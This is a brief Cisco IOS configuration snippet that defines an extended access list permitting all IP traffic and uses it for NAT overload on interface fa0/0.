ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload